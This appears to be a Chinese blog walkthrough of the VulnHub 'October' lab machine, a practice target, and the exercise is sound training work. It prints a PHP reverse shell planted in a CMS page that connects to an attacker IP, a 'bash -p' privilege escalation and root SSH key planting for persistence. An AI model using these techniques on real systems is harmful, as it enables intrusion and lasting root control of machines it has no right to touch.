VulnHub 靶场--October

  • 靶场搭建:
  • 靶场渗透:
    • 00x1: 信息收集
    • 00x2: 漏洞利用
    • 00x3: 系统提权
    • 00x4: SSH登录

靶场搭建:

下载完导入虚拟机,然后使用默认桥接模式即可。
下载链接:https://www.vulnhub.com/entry/its-october-1,460/
如果出现IP无法分配可参考:
https://www.cnblogs.com/yichen115/p/12609048.html

靶场渗透:

00x1: 信息收集

指纹信息:


端口扫描:

目录扫描:
后台:http://172.16.200.164/backend

关键信息:
从源代码获取信息,得到账户密码。

使用该账户密码,成功登录后台。

00x2: 漏洞利用

在信息收集后,接下来就是漏洞的挖掘和利用了,发现可利用点有:

利用点 攻击方式
ssh 、mysql 爆破
octobers CMS 版本漏洞

爆破并没有什么收获,漏洞库一查,发现October cms漏洞还是特多的。
尝试使用msf getshell, 但是利用失败:

使用后台添加页面模块反弹shell,

function onstart(){$s=fsockopen("172.16.200.158",12345);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);
}

添加shell页面后,使用NC 监听端口,访问页面获取shell:

00x3: 系统提权

使用LinEnum脚本收集系统信息

使用以下命令获取一个bash:

python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'

这里可以看到uid虽然是www-data的,但是euid却是root的。

linux系统中每个进程都有2个ID,分别为用户ID(uid)和有效用户ID(euid),UID一般表示进程的创建者(属于哪个用户创建),而EUID表示进程对于文件和资源的访问权限(具备等同于哪个用户的权限)。

这里我们已经可以看到proof了。

00x4: SSH登录

使用ssh密钥替换实现远程登录。

本地生成ssh秘钥后,并将公钥拷贝到web目录。接着在被攻击机上下载,然后拷贝到/root/.ssh/authorized_keys路径下

最后在攻击机上使用root私钥进行ssh连接:

VulnHub 靶场--October相关推荐

  1. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  2. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  5. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  6. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  7. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  8. vulnhub靶场,FirstBlood

    vulnhub靶场,FirstBlood 环境准备 靶机下载地址:https://www.vulnhub.com/entry/firstblood-1,564/ 攻击机:kali(192.168.10 ...

  9. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

  10. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

最新文章

  1. 面向Mobile device的CNN模型手工设计与NAS分析总结,MobileNet V1,V2,V3,Efficient,MNasNet以及Efficient network design
  2. 职称计算机word模拟题,2015职称计算机考试Word2003模拟题及答案
  3. ubuntu 常见配置文件
  4. MySQL 8.0 首个自适应参数横空出世
  5. linux 备份文件
  6. Visual Studio 2008创建项目(ATL)
  7. 输电线路巡检机器人PPT_国网泰安供电公司开展输电线路无人机精细化巡检
  8. JAVA数据库增删改查
  9. 破解新浪微博js加密登陆超详细
  10. illumina不愧是二代测序无冕之王
  11. 新华三2018校园招聘笔试面试题学习
  12. SaaSBase:什么是JIRA?
  13. ferguson博弈_组合博弈游戏
  14. 【实用工具】Visio画时序图组件
  15. 《微波原理与技术》学习笔记3传输线理论-史密斯圆图(Smith Chart)
  16. 实现C#和Python高效率混合编程
  17. [ CTF ]【天格】战队WriteUp- 2022年第三届“网鼎杯”网络安全大赛(青龙组)
  18. java夯实基础-基本数据类型
  19. 第七周【任务2】长短期记忆网络LSTM的前向、后向传播
  20. OpenJudge NOI 1.13 11:回文素数

热门文章

  1. 理解VML||MKL
  2. OPC DA 到 OPC UA
  3. ewebeditor漏洞利用总结
  4. Error running ‘Tomcat8.5‘ port out of range-1 (moments ago)
  5. 汽车零部件生产质量安全,路在何方?
  6. 线性独立成分分析(ICA)与鸡尾酒会问题
  7. 统计文件中元音字母的数量
  8. 移动端和网页端公告栏文字右向左轮播滑动
  9. ClickHouse可视化DBM Release 1.13.0
  10. mysql 错误码1236,MySQL错误:Last_IO_Errno:1236处理办法